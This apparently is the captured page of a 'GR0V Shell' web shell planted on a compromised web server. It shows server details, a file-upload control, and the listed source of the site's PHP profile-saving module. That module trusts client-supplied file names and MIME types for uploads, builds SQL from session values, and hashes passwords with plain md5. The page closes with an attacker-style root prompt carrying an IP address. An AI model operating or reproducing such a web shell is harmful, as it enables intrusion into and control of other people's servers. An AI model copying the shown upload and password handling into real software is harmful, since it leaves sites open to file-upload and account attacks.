? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/domains/happytokorea.com/public_html/modules/profile/
File Upload :
Current File : /home/admin/domains/happytokorea.com/public_html/modules/profile/mod.php

<?
class profile extends MySql
{
function save(){
	global $user_login;
	$new_name=$_POST['username'];
if($_FILES['files']['name']!=''){

$result=$this->Query("SELECT * FROM user_profile WHERE user_id='".$user_login['ID']."'");
$arr=mysql_fetch_array($result);
if($arr['photo'] != ''){
$flgDelete = unlink("images/".$arr['photo']);
}
	$filename	= $_FILES['files']['name'];
	$filetype	= $_FILES['files']['type'];
	$filetmp	= $_FILES['files']['tmp_name'];
																
	if($filetype == "image/gif"){
			$ContentPhoto=$filename.".gif";
	}else if ( $filetype == "image/bmp"){
			$ContentPhoto=$filename.".bmp";
	}else if ( $filetype == "image/png"){
			$ContentPhoto=$filename.".png";
	}else if (($filetype =="image/jpg")||($filetype  =="image/jpeg")||($filetype =="image/pjpeg")){
			$ContentPhoto=$filename.".jpg";
	}
	
	if($ContentPhoto != ""){
				if ($filetype != ""){
					move_uploaded_file($filetmp, "images/".$ContentPhoto);
				}
		$data=Array('photo'=>$ContentPhoto);
		$this->Update('user_profile',$data,"where user_id='".$user_login['ID']."'");
	}	
}						
	$data=array(
		'user_id'=>$user_login['ID'],
		'name'=>$_POST['name'],
		'day'=>$_POST['day'],
		'month'=>$_POST['month'],
		'year'=>$_POST['year'],
		'nickname'=>$_POST['nickname'],
		'lastname'=>$_POST['lastname'],
		'email1'=>$_POST['email1'],
		);

if($_POST['password']!='' && $_POST['repassword'] !='' && $_POST['password']==$_POST['repassword']){
$pass=array('user_password'=>md5($_POST['password']));
$this->Update('users',$pass,"where user_id='".$user_login['ID']."'");
$msg1=4;
	
	}

	$chk=$this->check_data('user_profile','user_id',$user_login['ID']);
	
	if($chk==1){
		$result=$this->Update('user_profile',$data,"where user_id='".$user_login['ID']."'");
	}else{
		$result=$this->Insert('user_profile',$data);
	}
		if($result){
			if($msg1==''){$msg1=1;}
			echo"<meta http-equiv=\"refresh\" content=\"0;url=$PHPSELF?mod=profile&msg=$msg1\">";
		}else{
		
			$error="ไม่สามารถบันทึกข้อมูลได้".$this->mysqlError();
			echo "<SCRIPT>alert(\"$error\"); window.history.back(); </SCRIPT>\n";
			exit(0);
		
		}


}//end edit_category
}//end class
?>

T1KUS90T
  root-grov@210.1.60.28:~$